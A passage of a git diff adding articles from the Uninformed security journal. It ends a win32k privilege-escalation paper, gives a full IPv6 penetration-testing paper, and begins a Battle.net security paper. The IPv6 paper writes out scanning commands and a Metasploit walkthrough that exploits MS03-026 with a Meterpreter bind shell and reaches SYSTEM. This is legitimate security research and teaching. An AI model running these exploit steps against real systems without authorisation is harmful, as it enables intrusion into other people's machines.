+way. + +5) Conclusion + +The Windows kernel components have unequal security verification level. The +main kernel module (ntoskrnl.exe) respects a standard verification dealing +with userland data. The win32k driver does not follow the same rules which +creates messy verification algorithms. This driver has an important +interaction with userland by different mechanism from usual syscall to +userland callback system. This architecture increase attack surface. The +vulnerable parts do not concern usual vulnerabilities but also internal +mechanism as GUI handle system. + +Chapter exposed vulnerabilities discovery and exploitation. Local +exploitation has many different attack vectors. Nowadays, the exploitation is +fast and sure, it works at any attempts. The kernel exploitation is possible +though different techniques. + +The win32k driver was not built with a secure design and now it becomes so +huge, with so many compatibility restrictions, that every release just +implements new features without changing anything else. Windows Vista +introduces many modifications but most of them are just automatic integer +overflow checks. It will solve many unknown issues but interaction between +user-mode and kernel-mode is hardly predictable. Vulnerabilities are not +always a matter of proper checks but also system interaction and custom +context. + +Implementing usual userland protections is not a good solution as kernel +exploitation is larger than overflows. The win32k driver could change by using +userland abstract layer in order to keep compatibility. This choice is not the +easier as it asks more time and work. The patch evoked in this paper +ameliorates a little bit win32k security as it goes deeper than reported +vulnerabilities. However the Windows Vista version of the win32k driver was +concerned by two vulnerabilities even if it was already more secure. Minor +modifications do not solve security issues. The overall kernel security has +been discussed on different paper about vulnerabilities but also rootkits. +Everyone agree that operating systems must evolve. Windows Seven could +introduce a new right architecture which secure critical component or just +improve win32k driver security. + +References + +[1] Microsoft Corporation. Microsoft Security Bulletin MS08-025 + http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx + +[2] Microsoft Corporation. Windows User Interface. + http://msdn.microsoft.com/en-us/library/ms632587(VS.85).aspx + +[3] Microsoft Corporation. SendMessage function. + http://msdn.microsoft.com/en-us/library/ms644950.aspx + +[4] ivanlef0u. You failed (blog entry about KeUsermodeCallback function in French). + http://www.ivanlef0u.tuxfamily.org/?p=68 + +[5] Microsoft Corporation. About Dynamic Data Exchange. + http://msdn.microsoft.com/en-us/library/ms648774.aspx + +[6] Microsoft Corporation. DDE Support in Internet Explorer Versions (still supported in ie7). + http://support.microsoft.com/kb/160957 + +[7] Wikipedia. Integer overflow. + http://en.wikipedia.org/wiki/Integeroverflow + +[8] mxatone and ivanlef0u. Stealth hooking : Another way to subvert the Windows kernel. + http://www.phrack.org/issues.html?issue=65&id=4#article + +[9] Kostya Kortchinsky. Kernel pool exploitation (Syscan Hong Kong 2008). + http://www.syscan.org/hk/indexhk.html + +[10] Ruben Santamarta. Exploiting common flaws in drivers. + http://www.reversemode.com/index.php?option=comremository&Itemid=2&func=fileinfo&id=51 + +[11] Ruben Santamarta. Exploit for win32k!ntUserFnOUTSTRING (MS08-25/n). + http://www.reversemode.com/index.php?option=com_content&task=view&id=50&Itemid=1 + +[12] Microsoft Corporation. MS08-025: Win32k vulnerabilities. + http://blogs.technet.com/swi/archive/2008/04/09/ms08-025-win32k-vulnerabilities.aspx + +[13] Cesar Cerrudo. Microsoft Windows kernel GDI local privilege escalation. + http://projects.info-pull.com/mokb/MOKB-06-11-2006.html + +[14] Microsoft Corporation. Steve Lipner and Michael Howard. The Trustworthy Computing Security Development Lifecycle + http://msdn.microsoft.com/en-us/library/ms995349.aspx diff --git a/uninformed/10.4.txt b/uninformed/10.4.txt new file mode 100644 index 0000000..92e3e9e --- /dev/null +++ b/uninformed/10.4.txt @@ -0,0 +1,484 @@ +Exploiting Tomorrow's Internet Today: Penetration testing with IPv6 +10/2008 +H D Moore +hdm@metasploit.com + +Abstract: This paper illustrates how IPv6-enabled systems with link-local and +auto-configured addresses can be compromised using existing security tools. +While most of the techniques described can apply to "real" IPv6 networks, the +focus of this paper is to target IPv6-enabled systems on the local network. + +Acknowledgments: The author would like to thank Van Hauser of THC for his +excellent presentation at CanSecWest 2005 and for releasing the IPv6 Attack +Toolkit. Much of the background information in this paper is based on notes +from Van Hauser's presentation. The 'alive6' tool included with the IPv6 +Attack Toolkit is the critical first step for all techniques described in this +paper. The author would like to thank Philippe Biondi for his work on SCAPY +and for his non-traditional 3-D presentation on IPv6 routing headers at +CanSecWest 2007. + +1) Introduction + +The next iteration of the IP protocol, version 6, has been "just around the +corner" for nearly 10 years. Migration deadlines have come and gone, +networking vendors have added support, and all modern operating systems are +IPv6-ready. The problem is that few organizations have any intention of +implementing IPv6. The result is that most corporate networks contain machines +that have IPv6 networking stacks, but have not been intentionally configured +with IPv6. The IPv6 stack represents an attack surface that is often +overlooked in corporate environments. For example, many firewall products, +such as ZoneAlarm on Windows and the standard IPTables on Linux, do not block +IPv6 traffic (IPTables can, but it uses Netfilter6 rules instead). The goal of +this paper is to demonstrate how existing tools can be used to compromise IPv6 +enabled systems. + +1.2) Operating System + +All tools described in this paper were launched from an Ubuntu Linux 8.04 +system. If you are using Microsoft Windows, Mac OS X, BSD, or another Linux +distribution, some tools may work differently or not at all. + +1.3) Configuration + +All examples in this paper depend on the host system having a valid IPv6 stack +along with a link-local or auto-configured IPv6 address. This requires the +IPv6 functionality to be compiled into the kernel or loaded from a kernel +module. To determine if your system has an IPv6 address configured for a +particular interface, use the ifconfig command: + +# ifconfig eth0 | grep inet6 +inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link + +1.4) Addressing + +IPv6 addresses consist of 128 bits (16 bytes) and are represented as a groups +of four hex digits separated by colons. A set of two colons ("::") indicates +that the bits leading up to the next part of the address should be all zero. +For example, the IP address for the loopback/localhost consists of 15 NULL +bytes followed by one byte set to the value of 0x01. The representation for +this address is simply "::1" (IPv4 127.0.0.1). The "any" IPv6 address is +represented as "::0" or just "::" (IPv4 0.0.0.0). In the case of link-local +addresses, the prefix is always "fe80::" followed by the EUI-64 formatted MAC +address, while auto-configured addresses always have the prefix of "2000::". +The "::" sequence can only be used once within an IPv6 address (it would be +ambiguous otherwise). The following examples demonstrate how the "::" sequence +is used. + +0000:0000:0000:0000:0000:0000:0000:0000 == ::, ::0, 0::0, 0:0::0:0 +0000:0000:0000:0000:0000:0000:0000:0001 == ::1, 0::1, 0:0::0:0001 +fe80:0000:0000:0000:0000:0000:0000:0060 == fe80::60 +fe80:0000:0000:0000:0102:0304:0506:0708 == fe80::0102:0304:0506:0708 + +1.5) Link-local vs Site-local + +On a given local network, all IPv6 nodes have at least one link-local address +(fe80::). During the automatic configuration of IPv6 for a network adapter, a +link-local address is chosen, and an IPv6 router discovery request is sent to +the all-routers broadcast address. If any IPv6-enabled router responds, the +node will also choose a site-local address for that interface (2000::). The +router response indicates whether to use DHCPv6 or the EUI-64 algorithm to +choose a site-local address. On networks where there are no active IPv6 +routers, an attacker can reply to the router discovery request and force all +local IPv6 nodes to configure a site-local address. + +2) Discovery + +2.1) Scanning + +Unlike the IPv4 address space, it is not feasible to sequentially probe IPv6 +addresses in order to discover live systems. In real deployments, it is common +for each endpoint to receive a 64-bit network range. Inside that range, only +one or two active nodes may exist, but the address space is over four +billion times the size of the entire IPv4 Internet. Trying to discover live +systems with sequential probes within a 64-bit IP range would require at +least 18,446,744,073,709,551,616 packets. + +2.2) Management + +In order to manage hosts within large IPv6 network ranges, DNS and other +naming services are absolutely required. Administrators may be able to +remember an IPv4 address within a subnet, but tracking a 64-bit host ID within +a local subnet is a challenge. Because of this requirement, DNS, WINS, and +other name services are critical for managing the addresses of IPv6 hosts. +Since the focus of this paper is on "accidental" IPv6 networks, we will not be +covering IPv6 discovery through host management services. + +2.3) Neighbor Discovery + +The IPv4 ARP protocol goes away in IPv6. Its replacement consists of the +ICMPv6 Neighbor Discovery (ND) and ICMPv6 Neighbor Solicitation (NS) +protocols. Neighbor Discovery allows an IPv6 host to discover the link-local +and auto-configured addresses of all other IPv6 systems on the local network. +Neighbor Solicitation is used to determine if a given IPv6 address exists on +the local subnet. The linklocal address is guaranteed to be unique per-host, +per-link, by picking an address generated by the EUI-64 algorithm. This +algorithm uses the network adapter MAC address to generate a unique IPv6 +address. For example, a system with a hardware MAC of 01:02:03:04:05:06 would +use a link-local address of fe80::0102:03FF:FE04:0506. An eight-byte prefix is +created by taking the first three bytes of the MAC, appending FF:FE, and then +the next three bytes of the MAC. In addition to link-local addresses, IPv6 +also supports stateless auto-configuration. Stateless auto-configured +addresses use the "2000::" prefix. More information about Neighbor Discovery +can be found in RFC 2461. + +2.4) The IPv6 Attack Toolkit + +In order to enumerate local hosts using the Neighbor Discovery protocol, we +need a tool which can send ICMPv6 probes and listen for responses. The alive6 +program included with Van Hauser's IPv6 Attack Toolkit is the tool for the +job. The example below demonstrates how to use alive6 to discover IPv6 hosts +attached to the network on the eth0 interface. + +# alive6 eth0 +Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx +Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy +Found 2 systems alive + +2.5) Linux Neighbor Discovery Tools + +The 'ip' command, in conjunction with 'ping6', both included with many recent +Linux distributions, can also be used to perform local IPv6 node discovery. +The following commands demonstrate this method: + +# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1 +# ip neigh | grep ^fe80 +fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE +fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE +fe80::218:8bff:fexx:xxxx dev eth0 lladdr 00:18:8b:xx:xx:xx REACHABLE +[...] + +2.6) Local Broadcast Addresses + +IPv6 Neighbor Discovery relies on a set of special broadcast addresses in +order to reach all local nodes of a given type. The table below enumerates the +most useful of these addresses. + + - FF01::1 = This address reaches all node-local IPv6 nodes + - FF02::1 = This address reaches all link-local IPv6 nodes + - FF05::1 = This address reaches all site-local IPv6 nodes + - FF01::2 = This address reaches all node-local IPv6 routers + - FF02::2 = This address reaches all link-local IPv6 routers + - FF05::2 = This address reaches all site-local IPv6 routers + +2.7) IPv4 vs IPv6 Broadcasts + +The IPv4 protocol allowed packets destined to network broadcast addresses to +be routed across the Internet. While this had some legitimate uses, this +feature was abused for years by traffic amplification attacks, which spoofed a +query to a broadcast address from a victim in order to saturate the victim's +bandwidth with the responses. While some IPv4 services were designed to work +with broadcast addresses, this is the exception and not the norm. With the +introduction of IPv6, broadcast addresses are no longer routed outside of the +local network. This mitigates traffic amplification attacks, but also prevents +a host from sending Neighbor Discovery probes into remote networks. + +One of the major differences between IPv4 and IPv6 is how network services +which listen on the "any" address (0.0.0.0 / ::0) handle incoming requests +destined to the broadcast address. A good example of this is the BIND DNS +server. When using IPv4 and listening to 0.0.0.0, DNS requests sent to the +network broadcast address are simply ignored. When using IPv6 and listening to +::0, DNS requests sent to the link-local all nodes broadcast address (FF02::1) +are processed. This allows a local attacker to send a message to all BIND +servers on the local network with a single packet. The same technique will +work for any other UDP-based service bound to the ::0 address of an +IPv6-enabled interface. + +$ dig metasploit.com @FF02::1 +;; ANSWER SECTION: +metasploit.com. 3600 IN A 216.75.15.231 +;; SERVER: fe80::xxxx:xxxx:xxxx:xxxx%2#53(ff02::1) + +3) Services + +3.1) Using Nmap + +The Nmap port scanner has support for IPv6 targets, however, it can only scan +these targets using the native networking libraries and does not have the +ability to send raw IPv6 packets. This limits TCP port scans to the +"connect()" method, which while effective, is slow against firewalled hosts +and requires a full TCP connection to identify each open port. Even with these +limitations, Nmap is still the tool of choice for IPv6 port scanning. Older +versions of Nmap did not support scanning link-local addresses, due to the +requirement of an interface suffix. Trying to scan a link-local address would +result in the following error. + +# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx +Starting Nmap 4.53 ( http://insecure.org ) at 2008-08-23 14:48 CDT +Strange error from connect (22):Invalid argument + +The problem is that link-local addresses are interface specific. In order to +talk to to the host at fe80::xxxx:xxxx:xxxx:xxxx, we must indicate which +interface it is on as well. The way to do this on the Linux platform is by +appending a "%" followed by the interface name to the address. In this case, +we would specify "fe80::xxxx:xxxx:xxxx:xxxx%eth0". Recent versions of Nmap +(4.68) now support the interface suffix and have no problem scanning +link-local IPv6 addresses. Site-local addresses do not require a scope ID +suffix, which makes them a little bit easier to use from an attacker's +perspective (reverse connect code doesn't need to know the scope ID, just the +address). + +# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0 +Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT +PORT STATE SERVICE +22/tcp open ssh + +3.2) Using Metasploit + +The development version of the Metasploit Framework includes a simple TCP port +scanner. This module accepts a list of hosts via the RHOSTS parameter and a +start and stop port. The Metasploit Framework has full support for IPv6 +addresses, including the interface suffix. The following example scans ports 1 +through 10,000 on the target fe80::xxxx:xxxx:xxxx:xxxx connected via interface +eth0. This target is a default install of Vista Home Premium. + +# msfconsole +msf> use auxiliary/discovery/portscan/tcp +msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0 +msf auxiliary(tcp) > set PORTSTART 1 +msf auxiliary(tcp) > set PORTSTOP 10000 +msf auxiliary(tcp) > run +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1028 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1029 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1040 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:3389 +[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:5357 +[*] Auxiliary module execution completed + +In addition to TCP port scanning, the Metasploit Framework also includes a UDP +service detection module. This module sends a series of UDP probes to every +host defined by RHOSTS and prints out any responses received. This module +works with any IPv6 address, including the broadcast. For example, the session +below demonstrates discovery of a local DNS service that is listening on ::0 +and responds to requests for the link-local all nodes broadcast address. + +# msfconsole +msf> use auxiliary/scanner/discovery/sweep_udp +msf auxiliary(sweep_udp) > set RHOSTS ff02::1 +msf auxiliary(sweep_udp) > run +[*] Sending 7 probes to ff02:0000:0000:0000:0000:0000:0000:0001 (1 hosts) +[*] Discovered DNS on fe80::xxxx:xxxx:xxxx:xxxx%eth0 +[*] Auxiliary module execution completed + +4) Exploits + +4.1) IPv6 Enabled Services + +When conducting a penetration test against an IPv6 enabled system, the first +step is to determine what services are accessible over IPv6. In the previous +section, we described some of the tools available for doing this, but did not +cover the differences between the IPv4 and IPv6 interfaces of the same +machine. Consider the Nmap results below, the first set is from scanning the +IPv6 interface of a Windows 2003 system, while the second is from scanning the +same system's IPv4 address. + +# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0 +80/tcp open http +135/tcp open msrpc +445/tcp open microsoft-ds +554/tcp open rtsp +1025/tcp open NFS-or-IIS +1026/tcp open LSA-or-nterm +1027/tcp open IIS +1030/tcp open iad1 +1032/tcp open iad3 +1034/tcp open unknown +1035/tcp open unknown +1036/tcp open unknown +1755/tcp open wms +9464/tcp open unknown +# nmap -sS -p1-10000 -n 192.168.0.147 +25/tcp open smtp +42/tcp open nameserver +53/tcp open domain +80/tcp open http +110/tcp open pop3 +135/tcp open msrpc +139/tcp open netbios-ssn +445/tcp open microsoft-ds +554/tcp open rtsp +1025/tcp open NFS-or-IIS +1026/tcp open LSA-or-nterm +1027/tcp open IIS +1030/tcp open iad1 +1032/tcp open iad3 +1034/tcp open unknown +1035/tcp open unknown +1036/tcp open unknown +1755/tcp open wms +3389/tcp open ms-term-serv +9464/tcp open unknown + +Of the services provided by IIS, only the web server and streaming media +services appear to be IPv6 enabled. The SMTP, POP3, WINS, NetBIOS, and RDP +services were all missing from our scan of the IPv6 address. While this does +limit the attack surface on the IPv6 interface, the remaining services are +still significant in terms of exposure. The SMB port (445) allows access to +file shares and remote API calls through DCERPC. All TCP DCERPC services are +still available, including the endpoint mapper, which provides us with a list +of DCERPC applications on this system. The web server (IIS 6.0) is accessible, +along with any applications hosted on this system. The streaming media +services RTSP (554) and MMS (1755) provide access to the streaming content and +administrative interfaces. + +4.2) IPv6 and Web Browsers + +While most modern web browsers have support for IPv6 addresses within the URL +bar, there are complications. For example, with the Windows 2003 system above, +we see that port 80 is open. To access this web server with a browser, we use +the following URL: + +http://[fe80::24c:44ff:fe4f:1a44%eth0]/ + +Unfortunately, while Firefox and Konqueror can process this URL, Internet +Explorer (6 and 7) cannot. Since this is a link-local address, DNS is not +sufficient, because the local scope ID is not recognized in the URL. An +interesting difference between Firefox 3 and Konqueror is how the Host header +is created when specifying a IPv6 address and scope ID. With Firefox 3, the +entire address, including the local scope ID is sent in the HTTP Host header. +This causes IIS 6.0 to return an "invalid hostname" error back to the browser. +However, Konqueror will strip the local scope ID from the Host header, which +prevents IIS from throwing the error message seen by Firefox. + +4.3) IPv6 and Web Assessments + +One of the challenges with assessing IPv6-enabled systems is making existing +security tools work with the IPv6 address format (especially the local scope +ID). For example, the Nikto web scanner is an excellent tool for web +assessments, but it does not have direct support for IPv6 addresses. While we +can add an entry to /etc/hosts for the IPv6 address we want to scan and pass +this to Nikto, Nikto is unable to process the scope ID suffix. The solution to +this and many other tool compatibility issues is to use a TCPv4 to TCPv6 proxy +service. By far, the easiest tool for the job is Socat, which is available as +a package on most Linux and BSD distributions. To relay local port 8080 to +remote port 80 on a link-local IPv6 address, we use a command like the one +below: + +$ socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::24c:44ff:fe4f:1a44%eth0]:80 + +Once Socat is running, we can launch Nikto and many other tools against port +8080 on 127.0.0.1. + +$ ./nikto.pl -host 127.0.0.1 -port 8080 +- Nikto v2.03/2.04 +--------------------------------------------------------------------------- ++ Target IP: 127.0.0.1 ++ Target Hostname: localhost ++ Target Port: 8080 ++ Start Time: 2008-10-01 12:57:18 +--------------------------------------------------------------------------- ++ Server: Microsoft-IIS/6.0 + +This port forwarding technique works for many other tools and protocols and is +a great fall-back when the tool of choice does not support IPv6 natively. + +4.4) Exploiting IPv6 Services + +The Metasploit Framework has native support for IPv6 sockets, including the +local scope ID. This allows nearly all of the exploit and auxiliary modules to +be used against IPv6 hosts with no modification. In the case of web +application exploits, the VHOST parameter can be used to override the Host +header sent by the module, avoiding issues like the one described above. + +4.5) IPv6 Enabled Shellcode + +To restrict all exploit activity to the IPv6 protocol, not only do the +exploits need support for IPv6, but the payloads as well. IPv6 payload support +is available in Metasploit through the use of "stagers". These stagers can be +used to chain-load any of the common Windows payloads included with the +Metasploit Framework. Once again, link-local addresses make this process a +little more complicated. When using the bind_ipv6_tcp stager to open a listening +port on the target machine, the RHOST parameter must have the local scope ID +appended. By the same token, the reverse_ipv6_tcp stager requires that the LHOST +variable have remote machine's interface number appended as a scope ID. This +can be tricky, since the attacker rarely knows what interface number a given +link-local address corresponds to. For this reason, the bind_ipv6_tcp stager is +ultimately more useful for exploiting Windows machines with link-local +addresses. The example below demonstrates using the bind_ipv6_tcp stager with +the Meterpreter stage. The exploit in this case is MS03-036 (Blaster) and is +delivered over the DCERPC endpoint mapper service on port 135. + +msf> use windows/exploit/dcerpc/ms03_026_dcom +msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0 +msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp +msf exploit(ms03_026_dcom) > set LPORT 4444 +msf exploit(ms03_026_dcom) > exploit +[*] Started bind handler +[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... +[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...] +[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135] +[*] Sending exploit ... +[*] The DCERPC service did not reply to our request +[*] Transmitting intermediate stager for over-sized stage...(191 bytes) +[*] Sending stage (2650 bytes) +[*] Sleeping before handling stage... +[*] Uploading DLL (73227 bytes)... +[*] Upload completed. +[*] Meterpreter session 1 opened +msf exploit(ms03_026_dcom) > sessions -i 1 +[*] Starting interaction with 1... +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM + +5) Summary + +5.1) Key Concepts + +Even though most networks are not "IPv6" ready, many of the machines on those +networks are. The introduction of a new protocol stack introduces security +challenges that are not well-known and often overlooked during security +evaluations. The huge address range of IPv6 makes remote discovery of IPv6 +machines difficult, but local network discovery is still possible using the +all-nodes broadcast addresses. Link-local addresses are tied to a specific +network link and are only guaranteed unique on that network link where they +reside. In order to communicate with an IPv6 node using a link-local address, +the user must have knowledge of the local scope ID (interface) for that link. +In order for a remote application to connect back to the user over a +link-local address, the socket code must specify the local scope ID of the +correct interface. UDP services which listen on the IPv6 ANY address (::0) +will respond to client requests that are sent to the all-nodes broadcast +address (FF02::1), which differs from IPv4. IPv6 broadcast traffic is not +routable, which limits many attacks to the local network only. Even though +many flavors of Linux, BSD, and Windows now enable IPv6 by default, not all +applications support listening on the IPv6 interfaces. Software firewalls +often allow IPv6 traffic even when configured to block all IPv4 traffic. +Immunity CANVAS, the Metasploit Framework, the Nmap Security Scanner, and many +other security tools now support IPv6 targets. It is possible to use a tool +written for IPv4 against an IPv6 host by using a socket relay tool such as +xinetd or socat. + +5.2) Conclusion + +Although the IPv6 backbone infrastructure continues to grow and an increasing +number of client systems and devices support IPv6 out of the box, few ISPs are +able to provide routing between the customer site and the backbone. Until this +gap is closed, security assessments against IPv6 addresses will be limited to +the local network. The lack of awareness about IPv6 in most organizations can +provide an easy way for an attacker to bypass network controls and fly under +the radar of many security monitoring tools. After all, when confronted with +the message below, what is an administrator to do? + +References + +Exploits + - THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/ + - The Metasploit Framework - http://metasploit.com + - Immunity CANVAS - http://www.immunitysec.com/ +Tools + - ncat - svn co svn://svn.insecure.org/ncat (login: guest/guest) + - socat - http://www.dest-unreach.org/socat/ + - scapy - http://www.secdev.org/projects/scapy/ + - nmap - http://nmap.org/ + - nikto - http://www.cirt.net/nikto2 +Documentation + - RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt + - Official IPv6 Site - http://www.ipv6.org/ +Application Compatibility + - http://www.deepspace6.net/docs/ipv6statuspageapps.htm l + - http://www.stindustries.net/IPv6/tools.htm l + - http://www.ipv6.org/v6-apps.htm l + - http://applications.6pack.org/browse/support/ diff --git a/uninformed/10.txt b/uninformed/10.txt new file mode 100644 index 0000000..630696a --- /dev/null +++ b/uninformed/10.txt @@ -0,0 +1,24 @@ + + +Engineering in Reverse +Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS +Skywing +In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented. +pdf | html | txt + +Using dual-mappings to evade automated unpackers +skape +Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to. +pdf | html | txt + +Exploitation Technology +Analyzing local privilege escalations in win32k +mxatone +This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered. +pdf | html | txt + +Exploiting Tomorrow's Internet Today: Penetration testing with IPv6 +H D Moore +This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network. +pdf | html | txt + diff --git a/uninformed/2.1.txt b/uninformed/2.1.txt new file mode 100644 index 0000000..00e4308 --- /dev/null +++ b/uninformed/2.1.txt @@ -0,0 +1,453 @@ +Inside Blizzard: Battle.net +Skywing +skywinguninformed@valhallalegends.com +Last modified: 8/31/2005 + +1) Foreword + +Abstract: This paper intends to describe a variety of the problems Blizzard +Entertainment has encountered from a practical standpoint through their +implementation of the large-scale online game matchmaking and chat service, +Battle.net. The paper provides some background historical information into +the design and purpose of Battle.net and continues on to discuss a variety of +flaws that have been observed in the implementation of the system. Readers +should come away with a better understanding of problems that can be easily +introduced in designing a matchmaking/chat system to operate on such a large +scale in addition to some of the serious security-related consequences of not +performing proper parameter validation of untrusted clients. + + +2) Introduction + +First, a bit of historical and background information, leading up to the +present day. Battle.net is an online matchmaking service that allows players +to set up online games with other players. It is quite possibly the oldest +and largest system of it's kind currently in existence (launched in 1997). + +The basic services provided by Battle.net are game matchmaking and chat. The +matchmaking system allows one to create and join games with little or no prior +configuration required (other than picking game parameters, such as a map to +play on, or so-forth). The chat system is similar to a stripped-down version +of Internet Relay Chat. The primary differences between IRC and Battle.net +(for the purposes of the chat system) are that Battle.net only allows a user +to be present in one chat channel at once, and many of the channel parameters +that IRC users might be familiar with (maximum number of users in the channel, +who has channel operator privileges) are fixed to well-defined values by the +server. + +Battle.net supports a wide variety of Blizzard games, including Diablo, +Starcraft, Warcraft II: Battle.net Edition, Diablo II, and Warcraft III. In +addition, there are shareware versions of Diablo and Starcraft that are +supported on Battle.net, as well as optional expansions for Diablo II, +Starcraft, and Warcraft III. All of these games share a common binary +communication protocol that has evolved over the past 8 years, although +different games have differing capabilities with respect to the protocol. + +In some cases, this is due to differing requirements for the game clients, but +usually this is simply due to the older programs not being updated as +frequently as newer versions. In short, there are a number of different +dialects of the Battle.net binary protocol that are used by the various +supported products, all at the same time. In addition to supporting an +undocumented binary protocol, Battle.net has for some time now supported a +text-based protocol (the ``Chat Gateway'', as officialy documented). This +protocol supports a limited subset of the features available to clients using +the full game protocol. In particular, it lacks support for capabilities such +as account creation and management. + +Both of these protocols are now fairly well understood and documented certain +persons outside of Blizzard. Although the text-based protocol is documented +and fairly stable, the limitations inherent in it make it undesirable for many +uses. Furthermore, in order to help stem the flood of spam on Battle.net, +Blizzard changed their server software to prevent clients using the text-based +protocol from entering all but a few pre-defined chat channels. As a result +of this, many developers have reverse engineered (or more commonly, used the +work of those who came before them) the Battle.net binary protocol and written +their own "emulator" clients for various purposes (typically as a better +alternative to the limited chat facilities provided by Blizzard's game +clients). These clients emulate the behavior of a particular Blizzard game +program in order to trick Battle.net into providing the services typically +only offered to the game clients, hence the name ``emulator client''. Most of +these clients area referred to as ``emulator bots'' or ``emubots'' by their +developers, and the Battle.net community in general. In fact, there are also +partially compliant server implementations that implement the server-side chat +and matchmaking logic supported by Battle.net to varying degrees of accuracy. +One can today download a third party server that emulates the Battle.net +protocol, and a third party client that emulates a Blizzard client supporting +the Battle.net protocol, and have the two inter-operate. + + +3) Battle.net issues + +By virtue of supporting so many different game clients (at present, there are +11 distinct Blizzard-supported programs that connect to Battle.net), Blizzard +has a sizable version-control problem. In fact, this problem is compounded by +several issues. + +First, many client game patches add or change the protocol in significant +ways. For instance, the notion of password-protected, persistent player +accounts was not originally even designed into Battle.net, and was added at a +later date via a client patch (and server-side modifications). + +On top of that, many clients also have very significant differences in feature +support. To give an example, for many years Diablo and Diablo Shareware were +both supported on Battle.net concurrently while Diablo supported user accounts +and the shareware version did not. As one can imagine, this sort of thing can +give rise to a great many problems. The version control and update mechanism +is not separate from the rest of the protocol. Indeed, the same server, and +the same connection, are used for version control, but a different connection +to the same server is used for the transfer of client patches. As a result, +any compliant Battle.net server is required to support not only the current +Battle.net protocol version that is in use by the current patch level of every +existing client, but it must also support the first few messages used by every +single version of every single Battle.net client ever released, or at least +until the version checking mechanism can be invoked to distribute a new +version (which is not the first task that occurs in some older iterations of +the protocol). + +To make matters worse, there is now a proliferation of third party clients +using the Battle.net protocol (to varying degrees of accuracy compared to the +Blizzard game clients they attempt to emulate) in use on Battle.net today. +This began sometime in mid-1999 when a program called ``NBBot'',authored by +Andreas Hansson, who often goes by the handle ``Adron'', entered widespread +distribution, though this was not the intent of the author. NBBot was the +first third party client to emulate the Battle.net protocol to an extent that +allowed it to masquerade as a game client. Several years later, the source +code for this program was inadvertently released to wide-spread public +distribution, which kicked off large-scale development of third party +Battle.net protocol clients by a number of authors. + +Despite all of these challenges, Blizzard has managed to keep Battle.net up +and running for nearly a decade now, and claims over a million active users. +However, the road leading up to the present day has not been ``clear sailing'' +for Blizzard. This leads us into some of the specific problems facing +Battle.net leading up until the present day. One of the major 